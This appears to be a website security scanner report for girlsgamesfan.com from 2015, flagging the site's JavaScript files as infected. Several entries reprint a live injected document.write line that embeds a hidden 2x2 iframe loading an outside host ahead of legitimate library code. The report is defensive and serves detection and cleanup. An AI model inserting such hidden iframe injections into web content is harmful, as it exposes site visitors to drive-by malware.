Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=girlsgamesfan.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://girlsgamesfan.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 12 Jan 2015 10:06:26 GMT Location: http://www.girlsgamesfan.com/ Server: Apache Content-Length: 237 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.girlsgamesfan.com/ | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 12 Jan 2015 10:06:27 GMT Location: http://www.girlsgamesfan.com/en Server: Apache/2.2 Content-Length: 0 Content-Type: text/html | clean |
http://www.girlsgamesfan.com/en | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 12 Jan 2015 10:06:27 GMT Location: http://www.girlsgamesfan.com/en/ Server: Apache/2.2 Content-Length: 240 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.girlsgamesfan.com/en/ | 200 OK Content-Length: 37298 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://q-e.bplaced.net/cacf.html?i=3174895 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?i=3174895> | ||
http://www.girlsgamesfan.com/global/js/jquery_slimbox2.js | 200 OK Content-Length: 57414 Content-Type: application/javascript | malicious |
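Malicious code - confirmed by antiviruses (see below). In the excerpt, the injected statement comes before the original library code, and the same statement is reported for every script under /global/js/ in this report. That pattern suggests the files were modified on the server, so cleanup means restoring all of them from known-good copies and finding out how write access was obtained. document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=3174895></iframe>');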
(function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.ex Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://q-e.bplaced.net/cacf.html?j=3174895 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=3174895> | ||
http://www.girlsgamesfan.com/global/js/slimbox2.js | 200 OK Content-Length: 4259 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=3174895></iframe>');
(function(w){var E=w(window),u,g,F=-1,o,x,D,v,y,L,s,n=!window.XMLHttpRequest,e=window.opera&&(document.compatMode=="CSS1Compat")&&(w.browser.version>=9.3),m=document.documentElement,l={},t=new Image(),J=new Image(),H,a,h,q,I,d,G,c,A,K;w(function(){w("body").append(w([H=w('<div id="lbOverlay" /> jQuery(function($) { $("a[rel^='lightbox']").slimbox({}, null, function(el) { return (this == el) || ((this.rel.length > 8) && (this.rel == el.rel)); }); }); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://q-e.bplaced.net/cacf.html?j=3174895 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=3174895> | ||
http://www.girlsgamesfan.com/global/js/swfobject.js | 200 OK Content-Length: 9919 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=3174895></iframe>');
var swfobject=function(){var b="undefined",Q="object",n="Shockwave Flash",p="ShockwaveFlash.ShockwaveFlash",P="application/x-shockwave-flash",m="SWFObjectExprInst",j=window,K=document,T=navigator,o=[],N=[],i=[],d=[],J,Z=null,M=null,l=null,e=false,A=false;var h=function(){var v=typeof K.getElementById!=b&&typeof Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://q-e.bplaced.net/cacf.html?j=3174895 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=3174895> | ||
http://www.girlsgamesfan.com/global/js/lib.js | 200 OK Content-Length: 4151 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=3174895></iframe>');
function openPopup( szUrlPage, iWidth, iHeight) { var l = Math.floor((screen.width-iWidth)/2); var t = Math.floor((screen.height-iHeight)/2); window.open( szUrlPage, null, "width=" + iWidth + ",height=" + iHeight + ",top=" + t + ",left=" + l); } function truncString( szText, iMaxChars ){ if if (this.http_request.overrideMimeType) { this.http_request.overrideMimeType('text/html'); } } else if (window.ActiveXObject) { try { this.http_request = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { this.http_request = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) {} } } if (!this.http_request) { alert('Cannot create XMLHTTP instance'); } } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://q-e.bplaced.net/cacf.html?j=3174895 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=3174895> | ||
http://www.girlsgamesfan.com/global/js/jquery-1.1.3.1.pack.js | 200 OK Content-Length: 21717 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=3174895></iframe>');
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]) Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://q-e.bplaced.net/cacf.html?j=3174895 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=3174895> | ||
http://www.girlsgamesfan.com/global/js/jquery.history_remote.pack.js | 200 OK Content-Length: 2742 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=3174895></iframe>');
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]) Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://q-e.bplaced.net/cacf.html?j=3174895 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=3174895> | ||
http://www.girlsgamesfan.com/global/js/jquery.tabs.pack.js | 200 OK Content-Length: 5897 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=3174895></iframe>');
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]) Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://q-e.bplaced.net/cacf.html?j=3174895 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=3174895> | ||
https://apis.google.com/js/plusone.js | 200 OK Content-Length: 12798 Content-Type: application/javascript | clean |
http://myslivecek.simply.com/simply.js?code=3279;2;0&v=2 | 200 OK Content-Length: 27 Content-Type: application/x-javascript | clean |
http://widget.supercounters.com/online_i.js | 200 OK Content-Length: 4233 Content-Type: application/javascript | malicious |
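Malicious code - confirmed by antiviruses (see below). Unlike the files above, the excerpt shown for this widget contains no injected iframe, only visitor-counter code that collects the user agent, referrer and page URL, and no antivirus report text follows it on this page. Verify this verdict against the scanner's full report before acting on it. var sc_olimg_var = sc_olimg_var || [];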
function sc_online_i(id, fcolor, bgcolor) { var info; if (fcolor.indexOf("#") !== 0) fcolor = "#" + fcolor; bgcolor = bgcolor.replace(/#/, ""); if (encodeURIComponent) { info = '&ua=' + encodeURIComponent(navigator.userAgent); info = info + '&ref=' + encodeURIComponent(document.referrer); info = info + '&url=' + encodeURIComponent(window.location); } else { cd.style.fontSize = "12px"; cd.style.color = "#ff0000"; cd.style.borderColor = "#ffffff"; cd.style.borderWidth = "1px"; cd.style.borderStyle = "solid"; cd.style.backgroundColor = sc_olimg_var['bgcolor']; cd.title = "Supercounters"; cd.innerHTML = msg; cd.onclick = function() { window.location = "http://www.supercounters.com/"; }; ct_insert(cd, "supercounters.com/online_i.js"); } Antivirus reports:
| ||
http://server.cpmstar.com/view.aspx?poolid=15896&script=1 | HTTP/1.1 302 Found Cache-Control: private,no-store, no-cache, must-revalidate Connection: close Date: Mon, 12 Jan 2015 10:06:34 GMT Pragma: no-cache Location: http://server.cpmstar.com/view.aspx?poolid=15896&script=1&test=1 Server: Microsoft-IIS/7.5 Content-Length: 189 Content-Type: text/html; charset=utf-8 Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADM DEVa PSAa PSDa OUR OTR IND UNI NAV STA" Set-Cookie: USER_ID=%aem%ad%a9%0eZ%8ap_%b4%d8J%d4%3b%fa; domain=.server.cpmstar.com; expires=Fri, 12-Jan-2035 10:06:35 GMT; path=/ | clean |
http://server.cpmstar.com/view.aspx?poolid=15896&script=1&test=1 | 200 OK Content-Length: 512 Content-Type: text/html | clean |
http://server.cpmstar.com/test404page.js | 404 Not Found Content-Length: 1245 Content-Type: text/html | clean |
http://server.cpmstar.com/cached/anchorad.js | 200 OK Content-Length: 2456 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: girlsgamesfan.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 12 Jan 2015 10:06:26 GMT
Location: http://www.girlsgamesfan.com/
Server: Apache
Content-Length: 237
Content-Type: text/html; charset=iso-8859-1
...237 bytes of data.
GET / HTTP/1.1
Host: girlsgamesfan.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 12 Jan 2015 10:06:26 GMT
Location: http://www.girlsgamesfan.com/
Server: Apache
Content-Length: 237
Content-Type: text/html; charset=iso-8859-1
...237 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: girlsgamesfan.com
Referer: http://www.google.com/search?q=girlsgamesfan.com
Result:
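The result is similar to the first query. No suspicious redirects were found. This check only compares HTTP redirects with and without a search-engine Referer; it does not cover the injected iframes reported under Scanned pages/files, so a clean result here does not mean the site is clean.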
GET / HTTP/1.1
Host: girlsgamesfan.com
Referer: http://www.google.com/search?q=girlsgamesfan.com
Result:
The result is similar to the first query. There are no suspicious redirects found.